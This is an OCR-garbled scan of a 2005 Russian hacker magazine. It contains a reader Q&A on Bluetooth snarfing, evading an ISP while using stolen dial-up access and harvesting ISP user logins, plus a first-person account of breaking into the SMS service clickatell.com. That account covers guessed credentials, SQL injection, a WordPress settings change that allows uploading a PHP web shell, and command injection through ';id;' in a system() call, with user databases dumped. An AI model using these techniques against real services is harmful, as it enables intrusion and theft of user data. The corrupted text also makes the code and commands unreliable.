гат предлагается не задешево — 2400 полновесных долларов. 
Наилучшие результаты по эффективности обнажения производи- 
тель гарантирует для шелка, купальников и всех типов синтети- 
ческих материалов. 

В прошлом году японская компания Уатаба ОепзГіі выпустила 
хитрый аксессуар для мобильного телефона Ѵобаіюпе Ѵ602- 
ЗН — присоединяемую камеру ночного видения. Специально 
для раздевания аппарат не задумывался. Волшебный дар об- 
наружился случайно, и очень быстро это устройство стало по- 




[добротная утка, но тоже хорошо ;)] 








[«раздевающие» очки Х-ВеІІесІ Ѳоддіез с видеовыходом] 



пулярным среди подростков и 
сексуально озабоченных лич- 
ностей. В итоге ситуация полу- 
чила огласку в прессе и чуть 
не стала причиной скандала. 

Компания Ѵосіаіюпе осудила 
действия японцев, считая, что 
производителю телефона на- 
носится удар по имиджу. Са- 
ма камера стоит около 140 
долларов и продается через 
интернет, при этом ее можно 
использовать и с другими мо- 
делями телефонов. 

[в ритме диско] Возможно, ты сам был свидетелем одного 
удивительного, хотя и довольно частого явления. Когда после 
торжественного выпускного начиналась школьная дискоте- 
ка, выключали свет, и в мигающих вспышках стробоскопа на 
некоторых девчонках мгновенно исчезало платье. Окружаю- 
щие могли созерцать ярко светящееся белое нижнее белье. 
Я это наблюдал не раз, но до сих пор не знаю физического 
принципа данного фокуса. Очевидным было сочетание сле- 
дующих факторов: ультрафиолетовый оттенок освещения от 
стробоскопа, тонкое синеватое платье (необязательно 
слишком облегающее) и белое нижнее белье. Вероятно, ка- 
кой-то секрет был и в структуре синтетического материала, 
из которого сделано платье. 

Понятно, что такое зрелище вызывало сильное потрясение у 
просвеченной девушки и бурю восторга у мужичков. Девчон- 
ки знали о подобном явлении и аккуратно блюли принципы — 
на дискотеку белое не носить и платье из предательского 
материала не надевать. Иногда краем уха перед дискоте- 
кой можно было услышать шепот: «Ты что одела, дурочка, с 
ума сошла? Оно же исчезнет!». 

Бывало, что хитрые парни сами тайком притаскивали с собой 
стробоскоп, который программой предусмотрен не был. Визг 
при его включении был оглушительный ;). 

В заключение не могу не упомянуть еще один самый надежный 
и самый дешевый способ заглядывать сквозь одежду. Способ 
этот — развивать воображение ;). Преимущества очевидны: 
полная бесплатность, цветная картинка, исключительная пор- 
тативность и надежность. Для большей эффективности следует 
проводить регулярные тестирования и юстировки на журналах 
РІауЬоу, НизТІег и др. © 




[видеокамера Зопу с волшебным 
фильтром КАУА I пТгагес! Зее- 
ТОгоидО РР] 




Совершенный звук 
в совершенной форме 

Элегантная акустическая система Высокое качество звучания 
ЗВ-381 создана, чтобы стать частью позволяет в полной мере наслаж- 
Вашего стиля. даться красотой любимых мелодий. 



[ОБ ЭФФЕКТЕ КРАСНОЙ ПЛЕНКИ] 

«Азазелло просил не беспокоиться, уверял, что он видел 
не только голых женщин, но даже женщин с начисто сод- 
ранной кожей». 

М. Булгаков, «Мастер и Маргарита». 

Джон Ланкастер в одиночку, преимущественно ночью, 
Щелкал носом — в нем был спрятан инфракрасный объектив, 
А потом в нормальном свете представало в черном цвете 
То, что ценим мы и любим, чем гордится коллектив. 

В. Высоцкий, «Пародия на плохой детектив». 



Выходная мощность: 

Диапазон воспроизводимых частот: 
Соотношение сигнал/шум: 

Звуковое давление: 



60 Ватт 
30 Гц - 20 кГц 
85 дБ 
89 дБ 



ЗВ-381 - победитель соревнований «ММ-звук» по качеству звучания. 



ѵѵѵѵѵѵ.іеІЬаІапсе.ги 

МЕВиОІЧ-СШІіпк 

+7(095)744.0333 

МЕВиОІЧ-ЕІзіе 

+7(095)777.9779 



МЕВиОІЧ-Оепікіп 

+7(095)787.4999 

МЕВиОІЧ-игагсІ 

+7(095)780.3266 



Лз ЗеІЬаІапсе 







Порутил пару тачек, сейчас админю их по 
Ретоіе Оезшр. Можно ли в нем как-то менять 
номер порта? 



удь конкретным и задавай конкретные 
вопросы! Старайся описать свою проб- 
лему максимально детально перед по- 
сыпкой в НасНОС. Только так а смогу 
действительно помочь тебе отлетом, ука- 
зать на возможные ошибки. Остерегайся 
общих вопросов вроде «Как взломать ин- 
тернет?», ты лишь потратишь мой и свой 
почтовый трафик. Трясти из меня фриш- 
ки (мнет, шеллы, карты) не стоит, я сам 
жилу на гуманитарной помощи! 



® Трудно поверить, но этот вопрос звучит в каждом третьем письме. 

Итак, если нужно выполнить установку из сырцов, последовательность 
выполнения команд будет такой. По умолчанию РЮР (Веплоіе йезкіор Ргоіосоі) 
висит на 3389 порте. Смена порта производится одним движением знающей 
руки , модификацией Н КЕѴ_І_ОСАІ__МАСН № Е\8у5Іет\СиггепЮопІгоІ5еДСопІгоІ\ 
ТегтіпаІ8егѵег\Ѵ\/іп5Міоп5\Р0Р-Тср\РогІМитЬег. Здесь выставляется любой 
желанный номер. 

® Что такое Ыиеіаскіпд? 

( Л } 

у Блюджекинг - новая модная тенденция в западлостроении. Тебе 
лишь нужен телефон (смартфон) с поддержкой ВІиеІооНі. Также нужны 
ушастые юзеры, которые станут жертвами Ыифск-приколов. Путем изучения 
эфира выявляются находящиеся рядом ВТ-телефоны. На них можно будет пос- 
лать сообщение, картинку или мелодию. Сообщения обычно посылаются через 
«Контакты», когда твое сообщение пакуется в форму бизнес-карточки. Больши- 
нство жертв обретают легкую форму паранойи по получении подобного «приве- 
та» - сообщения с указанием интимных деталей их внешнего вида. В метро 
можно комментировать заголовки газет и обложки книжек; в вещевых магази- 
нах советовать покупателям выбрать ту или иную вещь. Есть более жестокие 
формы прикола, когда похищается вся инфа с мобильника жертвы. Название 
ВІиеЗаскіпд происходит от имени его изобретателя - аЗаск’а. 

® Почему мой телефон (Збагр 0X30) не 
подходит для блюджека? 

Эта конкретная модель и ряд других имеют серьезный недостаток: 
единственным дружественным им Ыиеіооііі-девайсом является Ііапсіз- 
Тгее-комплект. Так что у тебя нет возможности подрубить любые другие де- 
вайсы, как те же самые мобилы. Так что, встав на скользкий путь блюджеке- 
ра, проверяй заранее полигамию трубы в отношении других ВТ-девайсов. 




Ф Хочу закардить трубу на еВау. Там предлагают 
какие-то 3)М-1гее телефоны. В чем их отличие 
от обыкновенных? 

® ЗІІѴИгее значит всего-навсего, что трубка не залочена (ипіоскесі), 

она не привязана к какому-либо контракту. Тема особенно актуальна 
на Западе, где контрактные трубки продаются значительно дешевле в слу- 
чае заключения контракта (от 6 до 24 месяцев обыкновенно) с мобильным 
оператором. 

® Почему меня спрашивают о пароле, когда я пы- 
таюсь блюджекнуть кого-то? 

( П } 

уНу Тема в том, что ты пытаешься спарить свою трубу с чужим девай- 
сом. Тебе вовсе не нужно спаривание, твоя цель лишь послать сооб- 
щение. Скорее вылезай из «Му Реѵісез». Нужно пойти в список контактов и 
выбрать «ЗепсІ а СопМ». 

® Как воровать инфу с чужих трубок? 

® Это направление взлома называется Ыиезпаіііпд. Под похищением 

инфы имеется ввиду стягивание чужих записных книжек, архивов сооб- 
щений, графики и записей ежедневника. Детальное описание уязвимости ты 
найдешь на «тіІіеІ)ипкег.пеІ/$есигііу/ЫиеіооіІі.Іііт. Проблема была обнаружена в 
конце 2003 года. Некоторые телефоны не могли надлежащим образом про- 
вести аутентификацию девайса и выходили на связь со всеми желающими. 
Для реализации нужен был КПК или ноутбук, так как нужный софт ВІиезйлпЫег 
не был доступен под тогдашними зплагфіюпе- платформам и. Помимо этого, 
была другая уязвимость - отдельные трубки продолжали держать связь с де- 
вайсами, даже когда те были удалены из ІгизІесІ-листа. БИАРЕ-атака характер- 
на еще тем, что жертве остается неведом факт подключения к его девайсу. 
Наиболее известные ВІиеІооІіі-уязвимые трубки (со старым ПО): Иокіа 631 0і, 
891 0і, 7650; Золу Егісззоп Т68і, Т610, Т630, 2600, 21010; Зіетепз 555, 5X1; 
Моіогоіа Ѵ80, Ѵ800. Самой разумной защитой от атаки оказывается своевре- 
менный апгрейд софта телефона. Конечно, остается и более капитальное ре- 
шение - полное выключение интерфейса ВТ. Последнее будет актуально для 
Егісззоп’ов старшего поколения (обновить прошивку не так-то легко) - Т39, 
В520т, Т68. 





ѴѴагсІгіѵіпд, то есть скан эфира в поиске беспроводных сетей с пуб- 
личным доступом, растет числом. Посему принимаются и активные ме- 
ры по борьбе со сканерами. Так, пару лет назад Америка начала программу 
ѴѴІ5Е (ѴѴігеІезз ІпТогтаііоп Зесигйу Ехрегітепі). Первый подобный ѴѴі-Рі Ітопеу- 
роі был развернут в Вашингтоне бывшим ІТ-спецом из ВВС Америки. Исследо- 
вание проводилось, чтобы понять темную сущность ѴѴі-Рі хакера, исследовать, 
какого рода атаки будут проводиться после получения доступа к ассезз роіпі’у. 
Самая первая реализация ѴѴІ5Е не предоставляла доступа к инету после подк- 
лючения, потом организаторы дали доступ к ѵѵеЬ’у с открытым сообщением 
для хакеров: вас мониторят, для продолжения работы нужно согласиться с 
данным фактом. Понятно, что далеко не все Іпопеуроі-начинания столь же этич- 
ны, как и ѴѴІ5Е: другие чекисты могут следить за тобой без предупреждения. 



УУ Напер кучу халявного инета (сііаі-ир), но поль- 
зоваться им боюсь. Как сделать, чтобы меня 
провайдер не попалил? 

($) 

ѴѴ Следует заранее оговориться, что по-настоящему эффективного тех- 
нического способа решения проблемы просто не существует. Я не буду 
обсуждать тему анти-АОНов как морально устаревшую. Говорить о наличии АО- 
Нов у отдельных провов вовсе не стоит, ибо современные технические средства 
помогают отследить номер звонившего, даже если в момент звонка он не был 
зафиксирован логом. Может быть более логичный подход к проблеме. К приме- 
ру, собрать информацию о том, насколько жестко преследует халявщиков конк- 
ретный пров. Подобной инфой охотно делятся коллеги по цеху, которых можно 
выловить в соответствующих форумах и чатах. Следует посмотреть и на тип ак- 
каунта. Если это акк бедного юзера, который честно кладет кровные 30 у.е. на 
счет ежемесячно, то велик риск вызвать его негодование. Когда же это корпо- 
ративный анлимитед, проблем не возникает. Долгое время активным спросом 
у халявщиков пользуются біаі-ир аккаунты западных фирм, работающие в ПІІ по 
точкам доступа международных сетей (5ІТА, АТГ ѴѴогІсІпеІ, Іпіопеі). 

Ф Меня достали эти плагины для аськи, которы- 
ми меня добавляют в контакт-листы без спро- 
су. Как обломать неприятелей? 

(5) 

у Ну Последние версии Аси хранят контакт-листы на сервере МігаЬіІіз’а 

(АОІ_’а). Значит, и твой родной ІІІІМ прописан там же. Чтобы удалить се- 
бя оттуда, попробуй воспользоваться компактной софтинкой с а$есііка.ги - 100 
Зеіі-Петоѵег. Стерев себя из листа, ты заставишь преследователя наконец 
запросить твоего разрешения. 



Ф Как мне узнать логины всех біаі-ир юзеров мо- 
его прова? 



Ф 



Известный способ - овладение юзерской БД прова, где будут про- 
писаны логины, пароли и вся другая жизненно важная инфа по ним. 
Вероятно, данный способ не окажется доступен. При подобном раскладе ос- 
тается пресловутый пеіЬіоз-скан подсети провайдера. Часто ІМВ-имена юзе- 
ров соответствуют их логинам. Понятно, что у юзеров с незапароленными ша- 
рами злостные хакеры смогут стянуть всю необходимую инфу (где будут не 
только логины, но, вероятно, и пароли к ним). 



Ф Слышал, что автоматы с напитками вроде 
Соса-солы можно взломать через обычные 
кнопки! Правда? 

(п) 

уН у Если бы это было неопровержимой правдой во всех без единого 

исключения случаях, подобных автоматов не существовало бы вовсе, 
так как хакеры сразу разносили бы все добро по домашним холодильникам. 
Однако теоретически существует маза входа в сервисное меню ряда аппаратов 
путем нажатия определенной последовательности клавиш на передней панели. 
Детальное описание темы ты найдешь в инете, в статье «Наскіпд Соке 
МасЫпез» (привет Гуглу). Вкратце ее содержимое. Ряд аппаратов разворачи- 
вает желанное сервисное меню после нажатия последовательности 4-2-3- 1 
клавиш на передней панели. Обычно клавиша номер один - самая верхняя на 
панели. Если нажатие выбрасывает меню, можно двигаться дальше. Тут будут 
опции: СА5Н (кол-во накопленного кэша в аппарате), 5АІ_Е (сколько напитков 
было продано после последней загрузки), ѴЕВ (версия вшитого ПО), ЕХГВА5 
(типичная опция здесь - температура внутри аппарата по Фаренгейту), ЕППОВ 
(список случившихся ошибок в работе аппарата за последнее время). Так по- 
лучается простейший информационный хак, которым ты можешь удивить дру- 
зей-приятелей. Если разведаешь, как выбивать реальную жижу в баночках и 
бутылочках, сразу пиши мне! :) 

Ф Что такое гобоіз и зрісіегз для поисковиков и как 
они связаны с хаком? 

( П } 

Файл гоЬоіз.М кладется в корень веб-сервера (скажем, в ѵѵш.тусіо- 
таіп.сот/гоЬоШ). ПоЬоІз содержит инфу о том, какие файлы могут быть 
доступны для индексирования поисковиком. Сбором информации и ее индек- 
сированием занимаются зрісіегз, запущенные поисковиками. В гоЬоіз ты мо- 
жешь заносить сіізаііоѵѵ записи. Данный коммент покажет зрісіег’у, что он не мо- 
жет скачать конкретный файл с сайта. Можно отметить отдельные папки - /сді- 
Ьіп, к примеру. Или прописать, какие поисковики могут скачивать отдельное 
файло, а каким следует отдыхать. Это комментируется линией ІІзег-адепГ Пос- 
тавив переменную «*», ты создашь правило для всех зрісіег’ов. Строчка «ІІзег- 
адепі: доодІеЬоі» даст понять, что обработкой сможет заниматься лишь 
Соодіе’овский бот. Главная проблема зрісіегз заключается в том, что они часто 
индексируют инфу, которую не предполагалось выносить на суд публики, та- 
кую как базы данных и скрипты. ПоЬоІз же, по идее, должны защитить от дан- 
ного недуга. Увы, никто не совершенен, и админы часто неграмотно конфигу- 
рируют эти файлы. Очень много полезной инфы по теме ты найдешь на 
ѵѵѵѵѵѵ.$еагсііепдіпеѵѵогІсІ.сот/гоЬо1:$. 




ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕППІІМ НЬЮСЫ 




ЗМЗ-центр под 
контролем 




} 



СОЛНЕЧНЫМ МАЙСКИМ ДНЕМ Я ПО ОБЫК- 
НОВЕНИЮ КУПИЛ ЖУРНАЛ «ХАКЕР». В 
ЭТОМ НОМЕРЕ МЕНЯ ЖДАЛА ИНТЕРЕСНАЯ 
СТАТЬЯ ОТ ХИНТА ПРО СЕРВИС СЫСК- 
АТЕІ_І_.СОМ. ТЫ НАВЕРНЯКА НАСЛЫШАН ОБ 
ЭТОМ РЕСУРСЕ И, ВОЗМОЖНО, ДАЖЕ ТАМ 
ЗАРЕГИСТРИРОВАН. ОДНАКО ДЕСЯТИ ХА- 
ЛЯВНЫХ КРЕДИТОВ ХВАТАЕТ ЛИШЬ НА ПА- 
РУ-ТРОЙКУ ХОРОШИХ ПРИКОЛОВ. БЫСТРО 
ПОТРАТИВ ЭТОТ ЩЕДРЫЙ ПРЕЗЕНТ, МНЕ 
ЗАХОТЕЛОСЬ ВЗЛОМАТЬ НЕСЧАСТНУЮ 
КОНТОРУ И СДЕЛАТЬ СЕБЕ АНЛИМИТНЫЙ 
АККАУНТ I МазТег-Іате-тсізТег 



Тайна внутренностей сііскаіеіі.сот 
и взлом системы 

Как только у меня закончились халявные ЗМ$, я пос- 
пешил зарегистрироваться еще раз. Но хитрые аме- 
риканцы предусмотрели этот шаг. Они запретили 
регистрацию двух аккаунтов на один мобильный но- 
мер. Я просек фишку и вбил номер моего отца. Это 
прокатило, но следующие десять кредитов закончи- 
лись еще быстрее :(. Тогда я решил попробовать 
провести атаку на сервис сІіскаТеІІ.сот в надежде 
на то, что американские админы окажутся не слиш- 
ком крутыми парнями. 

[созрела мысль] В первую очередь у меня созрела 
мысль, что на сервисе могут существовать аккаун- 
ты вида «Іодіп: Іодіп» с положительным балансом. 
Поэтому, набравшись терпения, я начал вбивать 
рандомные имена и пароли в \л/еЬ-форму сайта. К 
моему удивлению, за час вбива я подобрал около 
тридцати аккаунтов, среди которых добрая поло- 
вина наделялась пятью, а то и десятью нетронуты- 
ми кредитами. 

Мысль о безлимитном доступе не покидала меня 
ни на секунду. Я понимал, что сбрутать подобный 
доступ невозможно, и поэтому решил послоняться 
по сайту в поисках бажных скриптов. Однако 
сколько я ни изменял параметры сценариев, види- 
мого успеха добиться не удавалось. Тогда я поду- 




® Оказывается, у сііскаіеіі. сот мал: «Если бага не видно на 

есть несколько проектов. И поверхности, то почему бы не 

все они в определенной сте- поискать его в глубине?». 
пени относятся к протоко- Другими словами, я надеялся 
лам сотовой связи :). найти какую-нибудь зацепку в 

комплекте сценариев, дос- 
тупных после успешного входа в систему. 

Неспешно залогинившись под подобранным аккаунтом пеі с 
паролем пеі, я посмотрел в левую часть страницы. Там находи- 
лась колонка ссылок на скрипты с какими-то непонятными от- 
четами. Как оказалось позже, это обычная статистика по поль- 
зователю, показывающая даты и количество ЗМ5, отосланных в 
отчетные дни. Я покопался в исходниках страницы и нашел 
длинный запрос, передающийся методом РОЗТ. Быстро изме- 
нив метод на 0ЕТ, я вставил обращение к БД в отдельное ад- 
ресное окно браузера. Запрос успешно выполнился, и перед 
моими глазами предстали две уведомительные строки. После 
этого я дал волю своим шаловливым ручкам и намеренно из- 
менил параметр топіИ, добавив в конец значения апостроф. 
После обновления я получил весь текст длинного запроса, а 
затем ошибку обработки $ОІ_-предложения. Это было клево, 
поскольку теперь я знал о том, что скрипт страдает ЗОБ-инъек- 
цией, и, кроме того, передо мной был сам запрос. Осталось 
лишь правильно использовать найденный баг. 



[забавы с 50І_] Поскольку я не осо- 
бо знаком с технологией ЗОІ_-ин- 
жекгирования, мне пришлось из- 
рядно попотеть, чтобы добиться ви- 
димых результатов взлома. Сперва 
я вставил в конец запроса фразу 
«ІІІМІОІМ зеіесі 1» и, как обычно, по- 
лучил ругань на несоответствие 
параметров. Затем я подобрал 
число выводимых полей, а также 
некоторые названия параметров. 
Работа была очень неблагодар- 
ной, зато результат взлома был пот- 
рясающим — я получил большую 
часть информации о пользовате- 
лях портала сііскаіеіі.сот. Затем я 
добавил в запрос условие И /НЕВЕ 
р.етоіі Ііке '%сІіскоіеІІ.сот%' и по- 
лучил список всех администрато- 
ров сервиса. Включая их етаіГы и 
сложнорасшифровываемые па- 
роли :). 

С одной стороны, у меня уже было многое: админский аккаунт на 
неограниченное количество $М$-сообщений и кривоватый дамп 
пользовательской базы. Но с другой — мне хотелось большего. Я 
очень желал попасть внутрь ресурса, посмотреть устройство 
сервера и скрипты отправки ЗМЗ. Поэтому у меня появилась 
мысль попробовать пологиниться на почтовые ящики администра- 
торов, используя полученные пароли. 

[сложный путь к сердцу системы] В результате ручного подбора 
выяснилось, что пять таіі-аккаунтов работали и пароли совпада- 
ли. В почтовом ящике одного из них находилось около сотни пи- 
сем. Сперва я принял корреспонденцию за спам, однако впос- 
ледствии понял, что поторопился. Что-то вынудило меня скачать 
все сообщения себе на комп, не удаляя их с сервера. И не ошиб- 
ся! Вместо спама меня ожидала почтовая переписка с сотрудни- 
ками компании. И надо сказать, письма были очень интересными 

— обсуждались коммерческие вопросы компании, будущие но- 
вовведения и т.п. Уже после третьего мыла я просек, что на серви- 
се должна быть какая-нибудь оболочка, где регулярно отмечают- 
ся работники. Что-то типа новостной ленты. И действительно, в од- 
ном из почтовых сообщений я нашел интересную ссылку на ре- 
сурс іі1ір://тапіі8.сІіскаіеІІ.сот. По прочтении всех писем мне 
ничего не оставалось делать, как завернуть ослика на этот ад- 
рес. Как я и догадывался, за ссылкой хранилась специальная 
Ьидігар-среда, куда разработчики постили ошибки в работе 
сервиса. Естественно, что так просто меня в систему не пустили 

— авторизационный сценарий требовал пароль. Но ведь у меня 
были все пароли администраторов! Грех не попробовать завет- 
ные пары «логин: пароль» в форме этого скрипта. К счастью, акка- 
унт одного из админов успешно подошел. 

Но радоваться было пока рано — мантис не представлял со- 
бой что-то ценное. Обычные формы со статусом выполненных 
или незаконченных заданий, которые намекали на то, что сре- 
да используется не только для обсуждения ошибок, но и перс- 
пектив, планов и т.п. Я уже было хотел покинуть этот ресурс, но в 
последнюю минуту заметил еще один линк на страницу 
Іііір://Ыод. сііскаіеіі.сот. Проверка ІР-адреса этого хоста по- 
казала, что он не совпадал с айпишником ѵѵѵѵѵѵ. сііскаіеіі.сот. 
Этот факт дал повод предположить существование второго 
сервера. И действительно, ресурс Ыод. сііскаіеіі.сот сущест- 
вовал. Он представлял собой еще один набор скриптов, но уже 
заточенный под технические задания. Там были сообщения о 
ребутах серверов, шлюзов, а также о внедрении каких-то непо- 
нятных технологий. Я даже удивился, что все эти ньюсы может 
посмотреть любой человек — среда не защищалась паролем. 
Но, дойдя до конца страницы, я увидел мелкую ссылку «І_одіп», 
которая предлагала войти в систему. 

Думаю, не стоит описывать, как я вошел на этот ресурс — исполь- 
зовался тот же пароль админа, который загадочным образом по- 
дошел к мантису. Надо сказать, что по функциональным возмож- 
ностям мантис просто отдыхает. В блоге было намного больше 
функций, среди которых я обнаружил полезный скрипт иріоасі- 
файлов. Сразу же захотелось залить РНР-шелл и выполнить нес- 
колько команд. Но я жестоко обломался, так как ирІоаб.рГір зая- 
вил, что не хочет принимать файлы с расширением РНР :(. Конеч- 
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Из-за того что админы 
быстро заткнули половину 
брешей, сделать полноцен- 
ный видеоролик уже невоз- 
можно. Поэтому на диске 
ты найдешь только форму 
для отсылки ЗМЗ-сообще- 
ний, а также свежую вер- 
сию программы 
МеззепдегРго. 

Не стоит забывать, что все 
проделки негодяйского ха- 
кера противозаконны, поэ- 
тому эта статья дана лишь 
для ознакомления и органи- 
зации правильной защиты с 
твоей стороны. За примене- 
ние материала в незакон- 
ных целях автор и редакция 
ответственности не несут. 




но, можно было бы замаскировать ѵ\/еЬ-шелл под картинку или 
бос-файл, но переименовать залитый документ было бы весьма 
затруднительно. 

[тапТіз спасает положение] Кроме ыріоасі-скрипта, в блоге не 
было ничего полезного. Новости также не радовали — сплошная 
рутинная полоса о выполненных заданиях. Я понимал, что раск- 
лад не в мою пользу, поэтому решил вернуться на страницы тап- 
ііз'а и перечитать все его архивы. Признаться, я надеялся найти 
там какие-нибудь пароли либо новые ссылки :). Результат поиска 
меня, мягко говоря, ошарашил. В одном из постов промелькнула 
загадочная ссылка на Іііір://Ыод.сІіскаіеІІ. сот/ра. Я зашел туда 
и увидел... незапароленный РГірМуАбтіп! В первую минуту я 
просто находился в состоянии эйфории — мне казалось, что все 
базы пользователей хранятся именно на этом серваке. Однако 
это оказалось не совсем так. В базах находились настройки, со- 
общения и прочие вещи, относящиеся к Ыод'у и какому-то \л/еЬ- 
календарю. Но, несмотря на это, РГірМуАбтіп выступил главным 
звеном цепочки хакерских действий. Просматривая таблицы ба- 




[АВТОМАТИЗИРОВАННАЯ РАССЫЛКА] 

Оказывается, слать ЗМЗ можно не только из ѵѵеЬ-сре- 
ды и глючного МеззепдегРРЮ. Система имеет свой 
АРІ, который реализуется на базе протокола НТТР. 
Чтобы облегчить работу по рассылке сообщений, я в 
свое время сделал НТМЬформу, которая обращалась 
к скрипту сІіскаіеІГа и отсылала нужный текст. Для за- 
интересованных лиц привожу ее нехитрый код. 

<{огпл плеЩосІ="РОЗТ" асІіоп= І Мр://арі.сІіска{еІІ.сотЛіир/5епйтзд І, > 
<іприі Іуре=ЫсІсІеп пате=арі_ісІ ѵаІие=Ю> 

<іпріЛ Іуре=ЫсІсІеп пате=изег ѵаІие=ІІЗЕВІ\ІАМЕ> 

<іпріЛ Іуре=ЫсІсІеп пате=раззѵѵогсІ ѵаІие=РА35ѴѴОЕЮ> 

<іприі Іуре=ЫсІсІеп пате=сІеІіѵ_аск ѵаІие=1> 

<іпріЛ іуре=іехі пате=1гот ѵаІие="І\ІАМЕ"> 

<*ехІагеа гоѵѵз= ,| 10" пате= ,, іехГ І соІз="70"><ДехІагеа> 

<іприі 1уре=зиЬтй ѵаІие=ЗепсІ сІазз=к)гт> 

<іприІ іуре=гезеі ѵаІие=СІеаг сІазз=к)гт> 

<Логт> 

Следует заметить, что значения Ю, ІІЗЕВЫАМЕ и 
РАЗЗѴѴОРЮ берутся из пользовательской базы. Либо 
легальным путем со страницы персональных настроек :) 



[хакер 04 [76] 05 045 ] 





[хакер 04 [76] 05 046 ] 




[успешный вход в Мантис] 

зы \л/огсІрге55 (она как раз и относилась к Ыод'у), я нашел очень 
интересную фичу. Оказывается, все настройки иріоасі-скрипта 
находятся в таблице \л/р_орііоп5. Нужный параметр, который грех 
было не поменять, назывался ЛІеирІоасІ_аІІо\л/есІіуре5. С помощью 
нехитрого $ОІ_-запроса ІІРОАТЕ ѵѵр_орііоп5 зеі орііоп_ѵоІие=']рд 
діі рпд с/ос рсіі ріір' И /НЕРЕ орііоп_поте=ЛІеирІоосІ_оІІоѵѵесІ- 
іурез' я слегка модифицировал настройку движка ;). Теперь 
скрипт уже не ругался на левое расширение файла и без слов 
сохранил веб-шелл в каталог /сіоіо/оросііе/ѵѵогсіргезз/ѵѵр-соп- 
іепі (путь, куда сохраняются залитые файлы, я узнал из той же таб- 
лицы \л/р_орііоп5). 

Как ты уже понял, сервер, где располагался Ыод, меня мало ин- 
тересовал. Эта машина не являлась главной в сервисе сііскаіеіі. 
Но поискать интересную информацию в каталогах сервера мне 
очень хотелось. Команда ипоте -а показала, что компьютер на- 
ходится под управлением Ыпих. Уже через пять минут я обнару- 
жил загадочную директорию асіппіп, в которой располагались 
какие-то сценарии. Исходя из того, что более ценной инфы мне 
найти не удалось, я сжал всю админку в архив, скопировал в ка- 
талог /баіа/арасИеДл/огбргеззЛл/р-сопіепі и слил все это дело 
на свой компьютер. Теперь мне предстояло изучить содержимое 
загадочного архива. 

[проникновение в админку] При детальном рассмотрении 
скриптов оказалось, что зона администрирования находится по 
адресу ѵѵѵѵѵѵ. сііскаіеіі. сот/сепігоі/осіппіп. Действительно, при 
попытке обращения к этой ссылке с меня потребовали логин и 
пароль. Мне повезло, так как НіраззмсІ также находился в архи- 
ве, который я скачал с сервера Ыод. Быстро скормив этот файл 
Джонику, я получил один подобранный аккаунт администрато- 
ра. Надо сказать, что пароль был уникальным и не совпадал с 
пассвордом в МуЗОБ. 

Зона администрирования представляла собой несколько 
скриптов, которые позволяли мониторить статус ЗМЗ-шлюзов, 
смотреть активность, а также выполнять ЗОБ-запросы. Пере- 
рыв все сценарии, я не нашел возможности заливать или ре- 





[а вот и рабочий РНР-шелл] 

дактировать файлы, а уж тем более выполнять команду. В 
принципе, встроенный ЗОБ-клиент позволил бы мне вывести 
все таблицы на экран, но я боялся, что мой браузер подвис- 
нет из-за переизбытка информации :). В связи с этим было ре- 
шено еще раз просмотреть внутренности всех скриптов в ло- 
кальном каталоге асітіп. Я пошел в верном направлении, так 
как быстро нашел уязвимость в сценарии гоиіег_іе5іег.рПр. 
Там располагался следующий код: 

зузіетС'/изг/ІосаІ/сІіскаіеІІ/Ьіп/гоиіеМезіег -II $изег_по $т ${еаіз $р 

-I $тзізсІп $с -ѵ 1 -і $Кег -Б $ои{ІеѵеІ /изг/ІосаІ/сІіскаІеІІ/Ьіп/гоиТегсІ.сопТ 

&> /ѵагЛтр/${пате 2>&Г); 

Обратившись к этому скрипту через админку, я понял, что РНР- 
программиста в этой конторе следует немедленно уволить :). Пе- 
ременная $и5ег_по запрашивалась прямо из формы. Таким обра- 
зом, ничто не мешало мне ввести в форму слово «;ісІ;». И действи- 
тельно, эта конструкция позволила мне обрести некий ѵ\/еЬ-шелл, 
но уже на главном сервере. 

Через полчаса я находился в консоли и бродил по каталогам 
главного сервера. Мои права были абсолютными, так как админи- 
страторы даже не удосужились обновить ядро в системе :). Все 
базы проекта я также бережно забэкапил и сохранил у себя на 
компьютере. Я много раз рассказывал о том, как осуществлять бэ- 
кап из МуЗОІ_, поэтому даже не заостряю на этом внимания. Един- 
ственная сложность — мне приходилось очень долго искать нуж- 
ный аккаунт, так как многие таблицы связывались внешним ключом 
по идентификатору пользователя. Таким образом, чтобы найти ан- 
лимитный аккаунт, мне надо было открыть таблицу с балансом, 
найти там пользователя с минусовыми кредитами, а затем запом- 
нить его номер. Потом уже в другой таблице отыскать идентифика- 
тор и определить сІіепІЧсІ и пароль юзера (по-видимому, там уста- 
новлена старая версия МуЗОБ, которая не поддерживает вложен- 
ных запросов. — Прим. ред.). Ну а после этого - залогиниться под 
анлимитчиком и отослать сотню-другую ЗМЗ-сообщений :). 

[тяжкие последствия] К сожалению, администраторы заметили 
мое пребывание на их серверах. Все мои айпишники прокси- 
серверов попали в бан-лист, админские пароли немедленно по- 
менялись. К тому же, теперь сисадмы заставляют бедных пользо- 
вателей менять их пароли на более сложные. Кроме этого, пас- 
сворды заносятся в базу уже в виде ІѴЮ5-хэша, расшифровать ко- 
торый довольно проблематично. 

Но, как известно, админ никогда не закрывает все баги :). На дан- 
ный момент ресурс до сих пор страдает ЗОІ_-инжекцией, а паро- 
ли на Ыод и тапііз остались неизменными. Но даже эти незакры- 
тые бреши уже не позволяют сливать новые дампы пользова- 
тельских таблиц и пользоваться анлимитными аккаунтами. Впро- 
чем, быть может, кто-нибудь из читателей отыщет новые уязвимос- 
ти, которые не удалось найти мне ;) © 



[ЧТО ПОМОГЛО МНЕ ПРИ ВЗЛОМЕ?] 

Ш Я убил больше часа на подбор названий таблиц и 
заголовков, чтобы вызвать ЗОБ-іпіесІіоп на главном 
сервере сііскаіеіі. сот. Только благодаря этому мне 
удалось отобразить пароли администратора. 

\2\ Вернувшись на Мапііз, я обнаружил ссылку на не- 
запароленный РГірМуАсІтіп. Поэтому бдительный 
анализ архивов переписки разработчиков идет хаке- 
рам только на пользу. 

[з] Архив скриптов, найденный на совершенно левом 
сервере, решил проблему доступа к административ- 
ной зоне сііскаіеіі.сот, а также помог мне найти брешь 
в РНР-коде 



[измененные параметры скрипта, которые хранятся в таблице] 





Приобретите ІЛТВА ТесІіпоЕсІде Нідіі Тогцие на базе 
процессора Іпіеі® Репііит® 4 с технологией НТ. 
Избежав возрастающих расходов на техническую 
поддержку старых ПК, Вы можете повысить 
продуктивность работы Вашей компании. 




репііит I/ 




Более 12 000 наименований на складе компьютеров, 
комплектующих, ноутбуков, оргтехники, 
аудио-видео техники, ІНі-Рі и компонентов, 
